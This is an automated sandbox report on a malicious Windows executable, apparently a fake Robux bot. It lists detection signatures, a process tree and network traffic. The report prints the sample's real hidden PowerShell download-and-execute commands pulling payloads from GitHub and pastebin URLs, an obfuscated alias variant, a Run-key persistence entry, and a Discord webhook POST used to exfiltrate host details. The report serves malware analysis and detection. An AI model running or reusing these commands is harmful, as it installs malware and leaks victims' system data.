Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lm9IJ4r9oO.exe

Overview

General Information

Sample name:Lm9IJ4r9oO.exe
renamed because original name is a hash value
Original sample name:23ce79edb738b3e6dfad9f4dff2ff1800c8f3ccd3b3e809d4dd95c8b3ecfe5dc.exe
Analysis ID:1534109
MD5:032bc4fb50a2d4fc55727d99248b29b2
SHA1:c517bf569347599fe848c3fc9381f6daf3f9ec71
SHA256:23ce79edb738b3e6dfad9f4dff2ff1800c8f3ccd3b3e809d4dd95c8b3ecfe5dc
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Machine Learning detection for sample
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Lm9IJ4r9oO.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe" MD5: 032BC4FB50A2D4FC55727D99248B29B2)
    • powershell.exe (PID: 7696 cmdline: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)' MD5: 3F92A35BA26FF7A11A49E15EFE18F0C2)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
      • powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing) MD5: 3F92A35BA26FF7A11A49E15EFE18F0C2)
        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
        • csc.exe (PID: 8132 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 8148 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF7B.tmp" "c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • attrib.exe (PID: 5436 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
    • WerFault.exe (PID: 7260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 1932 MD5: F5210A4A7E411A1BAD3844586A74B574)
  • forfiles.exe (PID: 7668 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
    • powershell.exe (PID: 7756 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: DFD66604CA0898E8E26DF7B1635B6326)
      • powershell.exe (PID: 4116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: DFD66604CA0898E8E26DF7B1635B6326)
  • forfiles.exe (PID: 1808 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
    • powershell.exe (PID: 2136 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: DFD66604CA0898E8E26DF7B1635B6326)
      • powershell.exe (PID: 7688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: DFD66604CA0898E8E26DF7B1635B6326)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7900INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xa677:$b1: ::WriteAllBytes(
  • 0x1c6ac:$b1: ::WriteAllBytes(
  • 0xe0375:$b1: ::WriteAllBytes(
  • 0x3b5ce:$s1: -join
  • 0x84bb0:$s1: -join
  • 0x91c85:$s1: -join
  • 0x95057:$s1: -join
  • 0x95709:$s1: -join
  • 0x971fa:$s1: -join
  • 0x99400:$s1: -join
  • 0x99c27:$s1: -join
  • 0x9a497:$s1: -join
  • 0x9abd2:$s1: -join
  • 0x9ac04:$s1: -join
  • 0x9ac4c:$s1: -join
  • 0x9ac6b:$s1: -join
  • 0x9b4bb:$s1: -join
  • 0x9b637:$s1: -join
  • 0x9b6af:$s1: -join
  • 0x9b742:$s1: -join
  • 0x9b9a8:$s1: -join
Process Memory Space: powershell.exe PID: 4116INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x138fea:$b1: ::WriteAllBytes(
  • 0x19f1e4:$b1: ::WriteAllBytes(
  • 0x38b94:$s1: -join
  • 0x38d51:$s1: -join
  • 0xc64ae:$s1: -join
  • 0xc6c0e:$s1: -join
  • 0x128e62:$s1: -join
  • 0x129d89:$s1: -join
  • 0x192b61:$s1: -join
  • 0x1aff9f:$s1: -join
  • 0x1bd074:$s1: -join
  • 0x1c0446:$s1: -join
  • 0x1c0af8:$s1: -join
  • 0x1c25e9:$s1: -join
  • 0x1c47ef:$s1: -join
  • 0x1c5016:$s1: -join
  • 0x1c5886:$s1: -join
  • 0x1c5fc1:$s1: -join
  • 0x1c5ff3:$s1: -join
  • 0x1c603b:$s1: -join
  • 0x1c605a:$s1: -join
Process Memory Space: powershell.exe PID: 7688INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x37231:$b1: ::WriteAllBytes(
  • 0x1d6016:$b1: ::WriteAllBytes(
  • 0x233f5:$s1: -join
  • 0x23b31:$s1: -join
  • 0x49c21:$s1: -join
  • 0x4a381:$s1: -join
  • 0x89e7e:$s1: -join
  • 0x96f53:$s1: -join
  • 0x9a325:$s1: -join
  • 0x9a9d7:$s1: -join
  • 0x9c4c8:$s1: -join
  • 0x9e6ce:$s1: -join
  • 0x9eef5:$s1: -join
  • 0x9f765:$s1: -join
  • 0x9fea0:$s1: -join
  • 0x9fed2:$s1: -join
  • 0x9ff1a:$s1: -join
  • 0x9ff39:$s1: -join
  • 0xa0789:$s1: -join
  • 0xa0905:$s1: -join
  • 0xa097d:$s1: -join

Other

SourceRuleDescriptionAuthorStrings
amsi64_4116.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xb646:$b1: ::WriteAllBytes(
  • 0x9d4b:$s1: -join
  • 0x34f7:$s4: +=
  • 0x35b9:$s4: +=
  • 0x77e0:$s4: +=
  • 0x98fd:$s4: +=
  • 0x9be7:$s4: +=
  • 0x9d2d:$s4: +=
  • 0xdd70:$s4: +=
  • 0xddf0:$s4: +=
  • 0xdeb6:$s4: +=
  • 0xdf36:$s4: +=
  • 0xe10c:$s4: +=
  • 0xe190:$s4: +=
  • 0xb6e0:$e4: Get-WmiObject
  • 0xb782:$e4: Get-WmiObject
  • 0xc259:$e4: Get-WmiObject
  • 0xc448:$e4: Get-Process
  • 0xc4a0:$e4: Start-Process
amsi64_7688.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xb646:$b1: ::WriteAllBytes(
  • 0x9d4b:$s1: -join
  • 0x34f7:$s4: +=
  • 0x35b9:$s4: +=
  • 0x77e0:$s4: +=
  • 0x98fd:$s4: +=
  • 0x9be7:$s4: +=
  • 0x9d2d:$s4: +=
  • 0xdd70:$s4: +=
  • 0xddf0:$s4: +=
  • 0xdeb6:$s4: +=
  • 0xdf36:$s4: +=
  • 0xe10c:$s4: +=
  • 0xe190:$s4: +=
  • 0xb6e0:$e4: Get-WmiObject
  • 0xb782:$e4: Get-WmiObject
  • 0xc259:$e4: Get-WmiObject
  • 0xc448:$e4: Get-Process
  • 0xc4a0:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing) , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7900, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", ProcessId: 8132, ProcessName: csc.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7900, TargetFilename: C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Powershell Download and Execute IEX
Source: Process startedAuthor: Joe Security: Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing) , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7900, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", ProcessId: 8132, ProcessName: csc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:55:12.953506+020028576591A Network Trojan was detected192.168.2.362871162.159.138.232443TCP
2024-10-15T15:55:18.941754+020028576591A Network Trojan was detected192.168.2.362872162.159.138.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:54:51.325571+020028576581A Network Trojan was detected192.168.2.362862162.159.138.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Lm9IJ4r9oO.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: Lm9IJ4r9oO.exeReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Lm9IJ4r9oO.exeJoe Sandbox ML: detected
Source: Lm9IJ4r9oO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62862 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:62864 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.3:62866 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:62868 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.3:62870 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62871 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62872 version: TLS 1.2
Source: Lm9IJ4r9oO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: Automation.pdb source: powershell.exe, 00000004.00000002.1820569925.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F6650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\Release\ConsoleApplication2.pdb source: Lm9IJ4r9oO.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1836250015.0000000008455000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbO source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1836250015.0000000008455000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F673E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1820569925.000000000739F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F6650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5c561934e089\mscorlib.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbg source: powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e089\mscorlib.pdbHo source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Commands.Utility.pdb4e089` source: powershell.exe, 00000004.00000002.1835795117.00000000083B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000004.00000002.1820569925.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_0068B063 FindFirstFileExW,0_2_0068B063

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.3:62862 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.3:62871 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.3:62872 -> 162.159.138.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Content-Type: application/jsonHost: discord.comContent-Length: 212Connection: Keep-Alive
